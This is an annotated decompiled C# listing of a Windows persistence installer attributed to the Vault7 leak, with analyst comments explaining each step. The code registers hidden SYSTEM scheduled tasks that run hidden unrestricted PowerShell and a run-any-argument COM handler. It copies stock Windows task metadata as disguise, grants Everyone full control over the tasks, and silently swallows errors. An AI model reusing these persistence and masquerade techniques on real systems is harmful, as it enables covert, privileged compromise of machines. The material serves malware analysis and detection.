Installer.dll (Vault7)
// Decompiled with JetBrains decompiler
// Type: Installer.Install
// Assembly: Installer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1DF6A781-016A-4A47-9C62-874A888EB357
// Assembly location:
using \u0004;
using \u0006;
using Microsoft.Win32;
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Principal;
using TaskScheduleHelper;
namespace Installer
{
/// <summary>
/// Decompiled persistence installer from the Vault7 leak. Constructing the class performs
/// three best-effort steps on the local machine (every failure is swallowed, nothing is
/// logged or reported): it drops a registry marker under HKLM\SOFTWARE\Microsoft\DRM,
/// registers two hidden scheduled tasks that run as SYSTEM, and sets an Internet Explorer
/// policy value. Identifier names (\u0001, \u0002, \u0003) are obfuscated and the decompiler
/// has mapped several distinct originals onto the same name: the void/string overloads
/// below differ only by return type, which is not valid C#, so this listing is evidence,
/// not buildable source.
///
/// Host indicators taken from the literals in this file:
///   - HKLM\SOFTWARE\Microsoft\DRM\{cd704ff3-cd05-479e-acf7-6474908031dd}  (default value = install time)
///   - HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = 1
///   - Scheduled task \Microsoft\Windows\Task Manager\System (COM handler CLSID {855fec53-d2e4-4999-9e87-3414e9cf0ff4})
///   - Scheduled task \Microsoft\Windows\Maintenance\SR (powershell -executionPolicy unrestricted ... every PT8H6M)
///   - Both tasks registered with SDDL D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0) — Everyone (S-1-1-0) gets
///     write-DAC, write-owner and generic-all on a SYSTEM task, i.e. any local user can start or edit it.
///
/// NOTE(review): the helper type \u0001 (namespaces \u0004/\u0006) is not in this listing; the
/// return types of its \u0001() calls (ITaskService, string, byte[]) are inferred from the
/// call sites only.
/// </summary>
public class Install
{
// Task Scheduler folder that the main "SR" task is registered in.
private static string \u0001 = "\\Microsoft\\Windows\\Maintenance";
// Name of the main task. The "value plus trailing space, then TrimEnd()" pattern recurs for the
// trigger interval and start boundary below; it looks like a fixed-width field patched into the
// binary at build time — TODO confirm, not stated in this file.
private static string \u0002 = "SR ".TrimEnd();
/// <summary>
/// Runs the install in order: DRM registry marker, scheduled tasks, IE policy value.
/// The three calls resolve to the no-argument void methods directly below; the
/// string-returning \u0001()/\u0002() of the same names are only used while building
/// the "SR" task (decompiler name collision).
/// </summary>
public Install()
{
this.\u0002();
this.\u0003();
this.\u0001();
}
/// <summary>
/// Sets HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize to
/// DWORD 1, creating the key if needed. The purpose is not stated here; presumably it keeps
/// the IE first-run dialog from interfering with the hidden PowerShell stage — TODO confirm.
/// Any error (e.g. insufficient rights to HKLM) is ignored.
/// </summary>
private void \u0001()
{
try
{
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Main").SetValue("DisableFirstRunCustomize", (object) 1);
}
catch (Exception ex)
{
}
}
/// <summary>
/// Writes an install marker: creates HKLM\SOFTWARE\Microsoft\DRM\{cd704ff3-cd05-479e-acf7-6474908031dd}
/// and stores DateTime.Now.ToBinary() (local time as a 64-bit integer) in its (Default) value.
/// Nothing in this listing reads it back; it is likely an install timestamp consumed by another
/// component — TODO confirm. Errors are swallowed.
/// </summary>
private void \u0002()
{
try
{
Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\DRM\\").CreateSubKey("{cd704ff3-cd05-479e-acf7-6474908031dd}").SetValue((string) null, (object) DateTime.Now.ToBinary());
}
catch (Exception ex)
{
}
}
/// <summary>
/// Obtains an ITaskService from the obfuscated helper, connects to the local Task Scheduler
/// with the caller's credentials (all four Connect arguments null), and runs the three task
/// steps: remove "CheckDisk", register the "System" COM-handler task, register the "SR"
/// PowerShell task. The bare catch hides every failure, including a failed Connect.
/// </summary>
private void \u0003()
{
try
{
ITaskService taskService = \u0001.\u0001();
taskService.Connect((object) null, (object) null, (object) null, (object) null);
this.\u0001(taskService);
this.\u0002(taskService);
this.\u0003(taskService);
}
catch
{
}
}
/// <summary>
/// Deletes the task "CheckDisk" from \Microsoft\Windows\Maintenance if it exists — probably
/// cleanup of an earlier or alternate artifact name (not stated here). The folder path is
/// written without the leading backslash, unlike the other two methods. GetFolder is outside
/// the try, so a missing folder propagates to the caller's catch and aborts the remaining steps.
/// </summary>
private void \u0001([In] ITaskService obj0)
{
ITaskFolder folder = obj0.GetFolder("Microsoft\\Windows\\Maintenance");
try
{
folder.DeleteTask("CheckDisk", 0);
}
catch
{
}
}
/// <summary>
/// Registers a hidden task named "System" in \Microsoft\Windows\Task Manager whose only action
/// is a COM handler (CLSID {855fec53-d2e4-4999-9e87-3414e9cf0ff4}; its registration is not in
/// this file). Skipped if a task of that name already exists. No trigger is created, so the
/// task only ever runs on demand (AllowDemandStart), and its handler Data is "$(Arg0)", the
/// Task Scheduler token for the first argument supplied at run time — effectively a
/// SYSTEM-level "run whatever I pass" primitive; parallel instances are allowed.
/// Author/Source/Description are copied from the existing "Interactive" task in the same
/// folder so the entry resembles the stock one (the code assumes that task exists; GetTask
/// would throw otherwise and the catch abandons the step). Registered with flags 2
/// (TASK_CREATE), user "SYSTEM", TASK_LOGON_SERVICE_ACCOUNT, and an SDDL that grants Everyone
/// (S-1-1-0) RP/WP/CC/DC/LC/SW/RC/WD/WO/GA — any local user can start or rewrite this task.
/// </summary>
private void \u0002([In] ITaskService obj0)
{
ITaskFolder folder = obj0.GetFolder("\\Microsoft\\Windows\\Task Manager");
try
{
IRegisteredTask registeredTask = (IRegisteredTask) null;
try
{
// GetTask throws FileNotFoundException when the task is absent; that is the "install" case.
registeredTask = folder.GetTask("System");
}
catch (FileNotFoundException ex)
{
}
if (registeredTask != null)
return;
// Template for the masquerade metadata; not modified.
IRegisteredTask task = folder.GetTask("Interactive");
ITaskDefinition pDefinition = obj0.NewTask(0U);
pDefinition.Settings.AllowDemandStart = true;
pDefinition.Settings.MultipleInstances = _TASK_INSTANCES_POLICY.TASK_INSTANCES_PARALLEL;
pDefinition.Settings.DisallowStartIfOnBatteries = false;
pDefinition.Settings.Hidden = true;
pDefinition.Settings.Priority = 5;
pDefinition.RegistrationInfo.Author = task.Definition.RegistrationInfo.Author;
pDefinition.RegistrationInfo.Version = "1.0";
pDefinition.RegistrationInfo.Source = task.Definition.RegistrationInfo.Source;
pDefinition.RegistrationInfo.Description = task.Definition.RegistrationInfo.Description;
IComHandlerAction comHandlerAction = (IComHandlerAction) pDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_COM_HANDLER);
comHandlerAction.ClassId = "{855fec53-d2e4-4999-9e87-3414e9cf0ff4}";
// $(Arg0) is substituted by Task Scheduler with the first run-time argument of the task.
comHandlerAction.Data = "$(Arg0)";
// DACL: allow Everyone (S-1-1-0) full control including write-DAC (WD), write-owner (WO) and generic-all (GA).
string str = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)";
folder.RegisterTaskDefinition("System", pDefinition, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str);
}
catch
{
}
}
/// <summary>
/// Builds the double-quoted PowerShell -Command payload for the "SR" task: predefines
/// $tn (the task name, "SR") and $tf (the task folder) and appends a script fragment returned
/// by the obfuscated helper (not in this listing). Exposing the task's own name and folder to
/// the script suggests it looks up its registered task to read the Data blob set in the
/// method below — TODO confirm. Same obfuscated name as the void method above (collision).
/// </summary>
private string \u0001()
{
return "\"$tn='" + Install.\u0002 + "';$tf='" + Install.\u0001 + "';" + \u0001.\u0001() + "\"";
}
/// <summary>
/// Base64-encodes a byte[] obtained from the obfuscated helper; the result is stored in the
/// "SR" task's Data field below. Its content is not visible here (presumably the next stage).
/// </summary>
private string \u0002()
{
return Convert.ToBase64String(\u0001.\u0001());
}
/// <summary>
/// (Re)registers the main persistence task "SR" in \Microsoft\Windows\Maintenance: any existing
/// "SR" is deleted first, then a hidden task is created that runs
///   powershell -executionPolicy unrestricted -WindowStyle Hidden -NonInteractive -Command "..."
/// on a time trigger starting 2016-01-21T00:00:00 and repeating every 8 h 6 min (PT8H6M) with
/// no end. Because the start boundary is in the past and StartWhenAvailable is set, the first run
/// happens as soon as the task is registered (the literal "0" in place of the date would mean
/// "start now"). RunOnlyIfNetworkAvailable means it does not fire while offline. Author, Source
/// and Description are resource-string references into srrstr.dll (Windows' System Restore
/// library), so the task displays the same localized text as the OS's own System Restore task
/// while living in a different folder. The principal is set to highest run level as the local
/// SYSTEM group, but the RegisterTask call then binds it to user "SYSTEM" with
/// TASK_LOGON_SERVICE_ACCOUNT and the same Everyone-generic-all SDDL as the "System" task.
/// The task XML has its version="1.2" attribute stripped before registration; the reason is
/// not stated (presumably acceptance on older Task Scheduler hosts — TODO confirm).
/// All errors, including a failed registration, are swallowed.
/// </summary>
private void \u0003([In] ITaskService obj0)
{
try
{
ITaskFolder folder = obj0.GetFolder(Install.\u0001);
try
{
// Replace rather than update: remove any previous "SR" (a missing task throws and is ignored).
folder.DeleteTask(Install.\u0002, 0);
}
catch (Exception ex)
{
}
ITaskDefinition taskDefinition = obj0.NewTask(0U);
// Localized metadata pulled from srrstr.dll string resources -321/-320/-322 (System Restore).
taskDefinition.RegistrationInfo.Author = "$(@%systemroot%\\system32\\srrstr.dll,-321)";
taskDefinition.RegistrationInfo.Source = "$(@%systemroot%\\system32\\srrstr.dll,-320)";
taskDefinition.RegistrationInfo.Description = "$(@%systemroot%\\system32\\srrstr.dll,-322)";
taskDefinition.Settings.StartWhenAvailable = true;
taskDefinition.Settings.RunOnlyIfNetworkAvailable = true;
taskDefinition.Settings.StopIfGoingOnBatteries = false;
taskDefinition.Settings.DisallowStartIfOnBatteries = false;
taskDefinition.Settings.Hidden = true;
// Resolve the (localized) account name for S-1-5-18 from the well-known SID instead of hard-coding "NT AUTHORITY\SYSTEM".
NTAccount ntAccount = (NTAccount) new SecurityIdentifier(WellKnownSidType.LocalSystemSid, (SecurityIdentifier) null).Translate(typeof (NTAccount));
taskDefinition.Principal.RunLevel = _TASK_RUNLEVEL.TASK_RUNLEVEL_HIGHEST;
taskDefinition.Principal.LogonType = _TASK_LOGON_TYPE.TASK_LOGON_GROUP;
taskDefinition.Principal.GroupId = ntAccount.ToString();
// Opaque base64 blob carried inside the task definition itself (see \u0002() above).
taskDefinition.Data = this.\u0002();
IExecAction execAction = (IExecAction) taskDefinition.Actions.Create(_TASK_ACTION_TYPE.TASK_ACTION_EXEC);
execAction.Path = "powershell";
execAction.Arguments = "-executionPolicy unrestricted -WindowStyle Hidden -NonInteractive -Command " + this.\u0001();
ITimeTrigger timeTrigger = (ITimeTrigger) taskDefinition.Triggers.Create(_TASK_TRIGGER_TYPE2.TASK_TRIGGER_TIME);
// ISO 8601 duration: 8 hours 6 minutes between runs; no repetition Duration is set, so it repeats indefinitely.
timeTrigger.Repetition.Interval = "PT8H6M ".TrimEnd();
timeTrigger.Repetition.StopAtDurationEnd = false;
timeTrigger.Enabled = true;
// Fixed past date; the sentinel "0" would select DateTime.Now instead.
string str1 = "2016-01-21T00:00:00.0000000 ".TrimEnd();
timeTrigger.StartBoundary = !str1.Equals("0") ? str1 : DateTime.Now.ToString("o");
// Same Everyone-full-control DACL as the "System" task.
string str2 = "D:(A;;RPWPCCDCLCSWRCWDWOGA;;;S-1-1-0)";
// Drop the <Task version="1.2"> attribute and register from XML rather than from the definition object.
string XmlText = taskDefinition.XmlText.Replace("Task version=\"1.2\"", "Task ");
folder.RegisterTask(Install.\u0002, XmlText, 2, (object) "SYSTEM", (object) null, _TASK_LOGON_TYPE.TASK_LOGON_SERVICE_ACCOUNT, (object) str2);
}
catch (Exception ex)
{
}
}
}
}